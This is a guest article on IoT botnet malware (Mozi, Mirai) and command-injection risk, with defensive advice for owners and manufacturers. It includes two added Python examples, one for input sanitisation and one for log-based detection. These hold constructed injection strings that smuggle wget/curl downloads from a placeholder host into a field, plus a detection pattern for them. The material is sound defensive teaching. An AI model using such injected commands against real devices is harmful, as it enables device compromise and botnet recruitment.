IoT Malware Attack Protection Amidst Covid-19 Threats
Guest Writer
IoT devices are now standard consumer and commercial technology. Their growing availability and often poor security mean they have emerged as a significant target for hackers. At the same time, the pivot to remote work during COVID-19 has encouraged cyber criminals to ramp up their efforts, making networks of all kinds much more vulnerable to attack.
Malware that targets IoT devices is rising, and cyber criminals are leveraging botnets in attacks more often.
Owners and developers of this technology should know how malware can infect IoT devices and the steps they can take to defend their products.
In 2020, most new IoT attacks were driven by two prominent IoT botnets: Mozi and Mirai. Mirai is an older botnet that first appeared in 2016, while Mozi was deployed in 2019. Mozi is likely based on Mirai, as the two botnets have significant code overlaps.
These botnets have become so extensive that, according to IBM security research, they account for “90% of observed traffic flowing to and from all Internet of Things (IoT) devices.” The botnets function by using already infected devices to target and infect others, exploiting vulnerabilities in an attempt to infect them with code that will make them part of the botnet.
IoT security is significantly changing due to malware, leaving devices unprotected and at risk.
Once the botnet is large enough, the hackers behind the network can use it to launch DDoS attacks. Because these attacks are distributed across a vast network of infected smart devices, they can be almost impossible for a host to respond to.
The same report also found that all IoT devices, regardless of function, are likely at risk. Hackers attacked a wide variety of smart devices, including IoT printers, signs, and TVs connected to corporate IT networks.
In addition to botnet malware, IoT end-users and manufacturers also have to contend with increasingly frequent ransomware and leakware attacks. Ransomware attacks hold devices or files hostage in exchange for payment from the victim. Leakware is similar, but the hacker instead threatens to leak or release confidential files if the victim does not pay.
The Mozi and Mirai botnets typically infect new devices through the use of command-injection (CMDi) attacks. This is a common tactic used against IoT devices, as it allows hackers to exploit common IoT security vulnerabilities and misconfigurations.
Three primary factors can make a device much more vulnerable to CMDi attacks. IoT systems often contain a web and debugging interface left over from firmware development. Hackers can exploit these interfaces to gain access to the device. PHP modules built into IoT web interfaces can also provide access to hackers.
Online IoT interfaces can also make devices much more vulnerable. Administrators often fail to harden these interfaces, leaving remote inputs unsanitized. Without sanitization, cyberattackers can input shell commands, allowing them to do just about anything they want, including using shell commands like “curl” or “wget” to retrieve content from malicious websites.
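How sanitizing remote input closes the command-injection path described above, shown as an added example that is not from the original article or any vendor's firmware. It assumes a hypothetical web-interface diagnostic that pings a user-supplied host; all function names and the sample input are constructed for illustration.

```python
import ipaddress
import shlex

# Constructed input of the kind the article describes: an address followed
# by a shell separator and a downloader (documentation-range addresses).
CONSTRUCTED_INPUT = "192.0.2.10; wget http://192.0.2.99/x"


def vulnerable_command(host):
    """Unsafe pattern: remote input is pasted into a shell command line."""
    return "ping -c 1 " + host  # would be handed to /bin/sh as one string


def hardened_argv(host):
    """Safe pattern: validate strictly, then build an argv list (no shell)."""
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError:
        raise ValueError("host must be a literal IPv4/IPv6 address") from None
    # Only the re-serialised, canonical address reaches the program.
    # Pass this list to subprocess.run(argv, shell=False).
    return ["ping", "-c", "1", str(addr)]


def shell_would_run(command_line):
    """Simplified model of how a shell splits a line into separate commands
    at ; | & (used only to show what the unsafe string means)."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=";|&")
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if set(token) <= set(";|&"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


if __name__ == "__main__":
    print(shell_would_run(vulnerable_command(CONSTRUCTED_INPUT)))
    print(hardened_argv("192.0.2.10"))
```

Allow-listing the expected value (here, a literal IP address) and avoiding the shell entirely is more robust than trying to strip "dangerous" characters from the input.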
End users should carefully research IoT devices and their developers before a purchase. Developers with a good track record on security are often more likely to market IoT devices that are easier to secure. End users should also implement good safety practices.
Changing the default password on new devices, downloading security patches, and deactivating unnecessary features — like remote access tools — are good starting points. Regular maintenance of IoT devices to ensure they are fully patched and monitored by business security software will also help.
Network segmentation can limit the access IoT devices have to the business network. If a device is compromised, this segmentation will reduce the potential damage it may cause.
The use of antiviruses, network traffic analysis tools, and other cybersecurity software can help end-users manage and monitor potential threats.
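One way such monitoring can flag the command-injection attempts described earlier, as an added example that is not from the original article. It assumes Common Log Format access logs from a device's web interface or a proxy in front of it; the log lines, paths and addresses are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Shell metacharacter (; | & ` newline or "$(") followed by a downloader
# the article names (curl, wget).
CMDI_PATTERN = re.compile(r"(?:[;|&`\n]|\$\()\s*(?:wget|curl)\b", re.IGNORECASE)
# Common Log Format: client address, then the quoted request line.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)')


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is inspected too."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_cmdi_attempts(lines):
    """Return (client_ip, parameter, decoded_value) for suspicious requests."""
    hits = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue
        # Split parameters before decoding so a literal "&" separator
        # between parameters is not mistaken for a shell operator.
        query = urlsplit(match.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = decode_fully(value)
            if CMDI_PATTERN.search(value):
                hits.append((match.group("ip"), name, value))
    return hits


# Constructed sample lines: documentation addresses, hypothetical CGI paths.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2021:10:00:00 +0000] "GET /status.cgi?host=192.0.2.10 HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2021:10:00:02 +0000] "GET /diag.cgi?host=192.0.2.10%3Bwget+http%3A%2F%2F192.0.2.99%2Fx HTTP/1.1" 200 0',
    '203.0.113.9 - - [01/Jan/2021:10:00:05 +0000] "GET /diag.cgi?host=1%2526%2526curl%2520192.0.2.99 HTTP/1.1" 200 0',
    '198.51.100.8 - - [01/Jan/2021:10:00:09 +0000] "GET /help?a=1&curl=yes HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in find_cmdi_attempts(SAMPLE_LOG):
        print(hit)
```

The third sample line is double-encoded, which is why the value is decoded more than once before matching; the fourth shows that a parameter merely named `curl` is not flagged.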
Companies should also be aware of how employee smart devices may be interacting with their business network. They may not be as secure as items IT workers have direct access to.
Manufacturers should also take steps to ensure IoT devices they produce are secure. Considering security at every step in the design process and avoiding common security pitfalls, for example by shipping items without debugging interfaces, will help businesses make more secure products.
The regular development and release of security patches will also be essential in keeping devices protected from malware attacks.
Cybercriminals are likely to ramp up attacks in the near future. Owners of IoT devices will likely continue to face malware, ransomware, and leakware threats. Best practices can help end-users keep their items safe. Even techniques as simple as regular patching can go a long way in keeping smart technology secure.
Manufacturers can also take action to create safer IoT devices. Avoiding common vulnerabilities and employing secure design practices will help ensure an end product is less vulnerable to attack.